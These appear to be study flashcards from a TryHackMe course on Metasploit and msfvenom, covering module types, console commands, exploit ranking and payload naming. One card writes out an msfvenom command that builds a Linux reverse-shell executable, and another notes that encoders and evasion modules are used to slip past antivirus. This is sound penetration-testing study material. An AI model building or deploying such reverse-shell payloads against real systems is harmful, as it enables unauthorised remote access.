THM 1/5/2023 - Metasploit and Msfvenom Flashcards

1
Q

What are the 3 main components of the Metasploit Framework?

A

msfconsole
Modules
Tools

2
Q

Define the following Modules
1) Auxiliary
2) Encoders
3) Evasion
4) Exploits
5) NOPs
6) Payload w/ 3 types
7) Post

A

Aux - Scanners, crawlers, fuzzers

Encoders - encode exploits and payload in the hope AV misses them

Evasion - Direct way to avoid AV

Exploits - self-explained

NOPs - Instruct the CPU to do nothing for one cycle; Used as a buffer to achieve consistent payload size

Payloads - Code that will run on the target system;
Type I - Singles: self-contained payload; no additional component or download needed
Type II - Stagers: responsible for setting up a connection; works well with Staged payloads
Type III - Stages: Downloaded by the Stager to allow you to use larger sized payloads

Post: Actions to do post exploitation

3
Q

Define the following commands
use
show
search
back
set
setg
unset
unsetg
exploit/run
background
sessions
help

A

use
show - list all modules
info - show more info about a module
search - conduct searches using CVE numbers, exploit names, or target system
back - go back/unselect a module
set/setg : set a variable / global variable
exploit/run : run module
background : send a session to the background and back to msfconsole
sessions : view background sessions
sessions -i # to bring forward an active session
help

4
Q

What does ranking mean in Metasploit?

A

Reliability of exploits

5
Q

Identify what this command does

msfvenom -p linux/x64/shell_reverse_tcp -f elf -o shell.elf lhost=[IP goes here] lport=[listen port goes here]

What difference does this make?
"linux/x64/shell_reverse_tcp vs linux/x64/shell/reverse_tcp"

A

-p = Payload
-f = file type
-o = name of output file

shell_ vs shell/
shell_ = this payload is all in one “stageless”
shell/ = this payload is part of a staged attack

6
Q

Explain what each of these means in a console.

msf6>
meterpreter>

A

msf[#] - Metasploit main console for all things Metasploit

meterpreter - A shell gained on target console after attack

7
Q

What is the msfvenom payload naming convention?

A

<os>/<arch>/<payload>
